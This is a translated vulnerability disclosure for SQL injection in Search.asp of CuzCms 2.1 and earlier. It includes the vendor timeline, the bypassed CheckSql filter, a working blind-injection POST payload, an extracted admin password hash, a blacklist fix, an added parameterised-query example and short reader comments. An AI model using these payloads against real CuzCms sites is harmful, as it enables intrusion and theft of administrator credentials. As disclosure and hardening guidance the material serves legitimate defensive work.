2015-01-12: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-04-13: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
SQL injection in CuzCms V2.1 and below
CuzCms (成创网站内容管理系统) is developed by Shenyang Chengchuang Network Technology Co., Ltd. on Microsoft ASP with a standard Access/MSSQL database back end. Most SQL injection in CuzCms is filtered, because Include\Conn.asp contains the CheckSql function (Conn.asp lines 47-101):
```vbscript
'================================================
' Function name: CheckSql
' Purpose: prevent SQL injection
'================================================
Function CheckSql(Str)
    If Str = "" Then
        CheckSql = ""
        Exit Function
    End If
    Str = Replace(Str, Chr(0), "", 1, -1, 1)
    Str = Replace(Str, """", """, 1, -1, 1)
    Str = Replace(Str, "<", "<", 1, -1, 1)
    Str = Replace(Str, ">", ">", 1, -1, 1)
    Str = Replace(Str, "script", "script", 1, -1, 0)
    Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0)
    Str = Replace(Str, "Script", "Script", 1, -1, 0)
    Str = Replace(Str, "script", "Script", 1, -1, 1)
    Str = Replace(Str, "object", "object", 1, -1, 0)
    Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0)
    Str = Replace(Str, "Object", "Object", 1, -1, 0)
    Str = Replace(Str, "object", "Object", 1, -1, 1)
    Str = Replace(Str, "applet", "applet", 1, -1, 0)
    Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0)
    Str = Replace(Str, "Applet", "Applet", 1, -1, 0)
    Str = Replace(Str, "applet", "Applet", 1, -1, 1)
    Str = Replace(Str, "[", "[")
    Str = Replace(Str, "]", "]")
    Str = Replace(Str, """", "", 1, -1, 1)
    Str = Replace(Str, "=", "=", 1, -1, 1)
    Str = Replace(Str, "'", "''", 1, -1, 1)
    Str = Replace(Str, "select", "select", 1, -1, 1)
    Str = Replace(Str, "execute", "execute", 1, -1, 1)
    Str = Replace(Str, "exec", "exec", 1, -1, 1)
    Str = Replace(Str, "join", "join", 1, -1, 1)
    Str = Replace(Str, "union", "union", 1, -1, 1)
    Str = Replace(Str, "where", "where", 1, -1, 1)
    Str = Replace(Str, "insert", "insert", 1, -1, 1)
    Str = Replace(Str, "delete", "delete", 1, -1, 1)
    Str = Replace(Str, "update", "update", 1, -1, 1)
    Str = Replace(Str, "like", "like", 1, -1, 1)
    Str = Replace(Str, "drop", "drop", 1, -1, 1)
    Str = Replace(Str, "create", "create", 1, -1, 1)
    Str = Replace(Str, "rename", "rename", 1, -1, 1)
    Str = Replace(Str, "count", "count", 1, -1, 1)
    Str = Replace(Str, "chr", "chr", 1, -1, 1)
    Str = Replace(Str, "mid", "mid", 1, -1, 1)
    Str = Replace(Str, "truncate", "truncate", 1, -1, 1)
    Str = Replace(Str, "nchar", "nchar", 1, -1, 1)
    Str = Replace(Str, "char", "char", 1, -1, 1)
    Str = Replace(Str, "alter", "alter", 1, -1, 1)
    Str = Replace(Str, "cast", "cast", 1, -1, 1)
    Str = Replace(Str, "exists", "exists", 1, -1, 1)
    Str = Replace(Str, Chr(13), "<br>", 1, -1, 1)
    CheckSql = Replace(Str, "'", "''", 1, -1, 1)
End Function
```
Request parameters are normally wrapped in this anti-injection check, for example SortID = CheckSql(Int(Request.Querystring("SortID"))). After going through the whole code base, I found that Search.asp reads the parameters KeyWord and Cuz without applying the SQL check:
```vbscript
KeyWord = Trim(Request("KeyWord"))
Cuz = Trim(Request("Cuz"))
```
They are then substituted directly into the query:
```vbscript
datafrom="Cuz_"&Cuz
datawhere="where "&ItemRecT&" "
if SortID>0 then datawhere=datawhere&"and SortID="&SortID&" "
if KeyWord<>"" then datawhere=datawhere&"and Item1 like '%"&KeyWord&"%' "
taxis="order by ItemID desc "
sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere
```
Exploiting the injection requires constructing the input carefully, so to see what is being run I wrote the executed SQL out to the page by adding a Response.Write after each statement. First SQL statement:
```vbscript
sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere
Response.Write "<font color=red>SQL1=>"&sql&"</font><br>"
```
Second SQL statement:
```vbscript
sql="select ItemID from ["& datafrom &"] " & datawhere & taxis
Response.Write "<font color=red>SQL2=>"&sql&"</font><br>"
```
Third SQL statement:
```vbscript
sql="select * from ["& datafrom &"] where ItemID in("& sqlid &") "&taxis
Response.Write "<font color=red>SQL3=>"&sql&"</font><br>"
```
Searching for the keyword w gives a normal result.
The executed statements printed to the page are:
```sql
SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%w%'
SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%w%' order by ItemID desc
SQL3=>select * from [Cuz_News] where ItemID in(69) order by ItemID desc
```
After analysis, the input is constructed at the KeyWord parameter and submitted by POST as follows (this tests whether the user table has more than 0 rows):
```
Cuz=News&KeyWord=术'%20and%20IIF((select%20count(*)%20from%20Cuz_User)>0,1,0)%20and%20'a'<>'a
```
The result of executing it is shown in the figure.
Note: if the input is constructed incorrectly, or there is no result, only the SQL1 statement is displayed, meaning the query did not succeed, as in the figure:
0 records displayed
http://www.cuzcms.com/ Search signature: powered by CuzCms
Verification by retrieving the administrator password:
Executed statements:
```sql
SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%'
SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%' order by ItemID desc
SQL3=>select * from [Cuz_News] where ItemID in(71) order by ItemID desc
```
The recovered content is 7a57a5a743894a0e; the real data is shown in the figure.
Verification complete.
Fix: add the following to NoSql.asp:
```vbscript
N_In = "'|;|and|(|)|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare"
```
Make sure parameters from every source (GET, POST, Cookie) pass through the SQL filter.
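The Search.asp query construction shown above beside a hardened form of the same query, as an added example that is not code from the report or from CuzCms: the table name (Cuz) is checked against a whitelist because it cannot be bound, and KeyWord/SortID are bound as parameters, so the report's payload is matched as literal text. ItemRecT is taken as the "ItemRec = True" condition visible in the page output; the module list, the "Product" name and the SQLite sample rows are constructed stand-ins for the Access tables.

```python
import sqlite3

# Modules Search.asp may legitimately query. "News" appears on the page;
# "Product" is a constructed placeholder for the other content modules.
ALLOWED_MODULES = {"News", "Product"}

# The KeyWord payload from the report, with %20 decoded to spaces.
PAYLOAD = "术' and IIF((select count(*) from Cuz_User)>0,1,0) and 'a'<>'a"


def build_search_sql_vulnerable(cuz, keyword, sort_id=0):
    """Mirrors the Search.asp construction: Cuz and KeyWord are
    concatenated into the statement unescaped."""
    datafrom = "Cuz_" + cuz
    datawhere = "where ItemRec = True "          # ItemRecT as seen in the output
    if sort_id > 0:
        datawhere += "and SortID=" + str(sort_id) + " "
    if keyword != "":
        datawhere += "and Item1 like '%" + keyword + "%' "
    return "select count(ItemID) as idCount from [" + datafrom + "]" + datawhere


def build_search_sql_safe(cuz, keyword, sort_id=0):
    """Hardened form: the table name cannot be bound, so it is checked
    against a whitelist; every user-supplied value is bound as a parameter."""
    if cuz not in ALLOWED_MODULES:
        raise ValueError("unknown module: %r" % cuz)
    sql = "select count(ItemID) as idCount from [Cuz_" + cuz + "] where ItemRec = True"
    params = []
    if sort_id > 0:
        sql += " and SortID = ?"
        params.append(int(sort_id))
    if keyword:
        sql += " and Item1 like ?"
        params.append("%" + keyword + "%")   # wildcards go in the value, not the SQL
    return sql, params


def count_matches(conn, cuz, keyword, sort_id=0):
    """Runs the hardened query; injected text is matched literally."""
    sql, params = build_search_sql_safe(cuz, keyword, sort_id)
    return conn.execute(sql, params).fetchone()[0]


def demo_db():
    """In-memory SQLite stand-in for the Access table, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Cuz_News (ItemID integer, ItemRec integer, SortID integer, Item1 text)")
    conn.executemany("insert into Cuz_News values (?, ?, ?, ?)",
                     [(69, 1, 1, "welcome"), (70, 1, 2, "technical note"), (71, 0, 1, "draft with w")])
    return conn
```

With the vulnerable builder the payload lands inside the where clause exactly as the SQL1 line above shows; with the hardened builder the same string only ever reaches the database as a LIKE pattern.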
Unable to reach the vendor, or the vendor actively refused.
Goubuli, you legend!
Uppercase bypass?
@tnt1200 @HackBraid Neither... the spot where it is exploitable is rather odd.